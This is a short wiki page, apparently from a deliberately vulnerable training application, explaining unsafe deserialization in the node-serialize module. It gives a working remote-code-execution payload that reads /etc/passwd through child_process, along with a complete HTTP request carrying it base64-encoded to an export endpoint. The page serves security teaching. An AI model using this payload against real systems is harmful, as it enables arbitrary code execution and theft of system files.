Skip to content

Unsafe Deserialization

Jump to bottom
Sam Sanoop edited this page Aug 7, 2021 · 2 revisions

Introduction

Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code

Details

Untrusted data passed into unserialize() function in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE).

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });}()"}

Request can be sent to the export API endpoint as follows

POST /api/v2/export HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjI4MzcwNDgzLCJleHAiOjE2Mjg1NDMyODMsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.aQ0mQCNBqbXXh5XHbcLUCcqSM9qNBifg2phI9LfNCCw
Content-Type: application/json;charset=utf-8
Content-Length: 207
Origin: http://target.local
Connection: close
Referer: http://target.local/passphrasegen.html

{"data":"eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lkO2NhdCAvZXRjL3Bhc3N3ZCcsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9"}

References

Solutions

FAQ

Questions

Clone this wiki locally